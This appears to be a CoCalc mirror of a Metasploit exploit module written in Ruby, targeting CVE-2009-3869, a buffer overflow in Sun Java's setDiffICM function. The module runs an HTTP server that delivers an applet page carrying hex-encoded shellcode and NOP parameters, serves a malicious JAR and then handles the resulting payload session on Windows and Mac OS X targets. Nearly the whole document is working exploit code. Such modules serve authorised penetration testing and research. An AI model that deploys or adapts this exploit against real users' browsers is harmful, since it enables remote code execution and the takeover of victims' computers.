CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/browser/java_setdifficm_bof.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  #

10
  # This module acts as an HTTP server

11
  #

12
  include Msf::Exploit::Remote::HttpServer::HTML

13


14
  def initialize(info = {})

15
    super(update_info(info,

16
      'Name'           => 'Sun Java JRE AWT setDiffICM Buffer Overflow',

17
      'Description'    => %q{

18
        This module exploits a flaw in the setDiffICM function in the Sun JVM.

19


20
        The payload is serialized and passed to the applet via PARAM tags. It must be

21
        a native payload.

22


23
        The effected Java versions are JDK and JRE 6 Update 16 and earlier,

24
        JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and

25
        earlier, and SDK and JRE 1.3.1_26 and earlier.

26


27
        NOTE: Although all of the above versions are reportedly vulnerable, only

28
        1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.

29
      },

30
      'License'        => MSF_LICENSE,

31
      'Author'         =>

32
        [

33
          'jduck'

34
        ],

35
      'References'     =>

36
        [

37
          [ 'CVE', '2009-3869' ],

38
          [ 'OSVDB', '59710' ],

39
          [ 'BID', '36881' ],

40
          [ 'ZDI', '09-078' ]

41
        ],

42
      'Payload'        =>

43
        {

44
          'Space'    => 1024,

45
          'BadChars' => '',

46
          'DisableNops' => true,

47
        },

48
      'Platform'       => %w{ win osx },

49
      'Targets'        =>

50
        [

51
=begin

52


53
No automatic targetting for now ...

54


55
          [ 'J2SE 1.6_16 Automatic',

56
            {

57
              'Platform' => %w{ linux osx win },

58
              'Arch' => [ARCH_X86, ARCH_PPC]

59
            }

60
          ],

61
=end

62
          [ 'J2SE 1.6_16 on Windows x86',

63
            {

64
              'Platform' => 'win',

65
              'Arch' => ARCH_X86

66
            }

67
          ],

68
          [ 'J2SE 1.6_16 on Mac OS X PPC',

69
            {

70
              'Platform' => 'osx',

71
              'Arch' => ARCH_PPC,

72
            }

73
          ],

74
          [ 'J2SE 1.6_16 on Mac OS X x86',

75
            {

76
              'Platform' => 'osx',

77
              'Arch' => ARCH_X86,

78
            }

79
          ],

80
        ],

81
      'DefaultTarget'  => 0,

82
      'DisclosureDate' => '2009-11-04'

83
      ))

84
  end

85


86


87
  def on_request_uri(cli, req)

88


89
    # Create a cached mapping between IP and detected target

90
    @targetcache ||= {}

91
    @targetcache[cli.peerhost] ||= {}

92
    @targetcache[cli.peerhost][:update] = Time.now.to_i

93


94
    if (target.name =~ /Automatic/)

95
      case req.headers['User-Agent']

96
      when /Windows/i

97
        print_status("Choosing a Windows target")

98
        @targetcache[cli.peerhost][:target] = self.targets[1]

99
      when /PPC Mac OS X/i

100
        print_status("Choosing a Mac OS X PPC target")

101
        @targetcache[cli.peerhost][:target] = self.targets[2]

102
      when /Intel Mac OS X/i

103
        print_status("Choosing a Mac OS X x86 target")

104
        @targetcache[cli.peerhost][:target] = self.targets[3]

105
      else

106
        print_status("Unknown target for: #{req.headers['User-Agent']}")

107
      end

108
    end

109


110
    # Clean the cache

111
    rmq = []

112
    @targetcache.each_key do |addr|

113
      if (Time.now.to_i > @targetcache[addr][:update]+60)

114
        rmq.push addr

115
      end

116
    end

117


118
    rmq.each {|addr| @targetcache.delete(addr) }

119


120


121
    # Request processing

122
    if (not req.uri.match(/\.jar$/i))

123


124
      # Redirect to the base directory so the applet code loads...

125
      if (not req.uri.match(/\/$/))

126
        print_status("Sending redirect so path ends with / ...")

127
        send_redirect(cli, get_resource() + '/', '')

128
        return

129
      end

130


131
      # Display the applet loading HTML

132
      print_status("Sending HTML")

133
      send_response_html(cli, generate_html(payload.encoded),

134
        {

135
          'Content-Type' => 'text/html',

136
          'Pragma' => 'no-cache'

137
        })

138
      return

139
    end

140


141
    # Send the actual applet over

142
    print_status("Sending applet")

143
    send_response(cli, generate_applet(cli, req),

144
      {

145
        'Content-Type' => 'application/octet-stream',

146
        'Pragma' => 'no-cache'

147
      })

148


149
    # Handle the payload

150
    handler(cli)

151
  end

152


153


154
  def generate_html(pl)

155


156
    html = <<-EOF

157
<html>

158
<head>

159
<!-- <meta http-equiv=refresh content=10 /> -->

160
</head>

161
<body>

162
<applet width='100%' height='100%' code='AppletX' archive='JARNAME'>

163
<param name='sc' value='SCODE' />

164
<param name='np' value='NOPS' />

165
</applet>

166
</body>

167
</html>

168
EOF

169
    # finalize html

170
    jar_name = rand_text_alphanumeric(32)+".jar"

171
    html.gsub!(/JARNAME/, jar_name)

172


173
    # put payload into html

174
    debug_payload = false

175
    pload = ""

176
    pload << "\xcc" if debug_payload

177
    pload << pl

178
    if ((pload.length % 4) > 0)

179
      pload << rand_text((4 - (pload.length % 4)))

180
    end

181
    if debug_payload

182
      print_status("pload #{pload.length} bytes:\n" + Rex::Text.to_hex_dump(pload))

183
    end

184
    html.gsub!(/SCODE/, Rex::Text.to_hex(pload, ''))

185


186
    # put nops into html

187
    nops = "\x90\x90\x90\x90"

188
    html.gsub!(/NOPS/, Rex::Text.to_hex(nops, ''))

189
    #print_status("nops #{nops.length} bytes:\n" + Rex::Text.to_hex_dump(nops))

190


191
    return html

192


193
  end

194


195


196
  def exploit

197
    path = File.join(Msf::Config.data_directory, "exploits", "CVE-2009-3869.jar")

198
    fd = File.open(path, "rb")

199
    @jar_data = fd.read(fd.stat.size)

200
    fd.close

201


202
    super

203
  end

204


205


206
  def generate_applet(cli, req)

207


208
    this_target = nil

209
    if (target.name =~ /Automatic/)

210
      if (@targetcache[cli.peerhost][:target])

211
        this_target = @targetcache[cli.peerhost][:target]

212
      else

213
        return ''

214
      end

215
    else

216
      this_target = target

217
    end

218


219
    return @jar_data

220
  end

221
end

222


223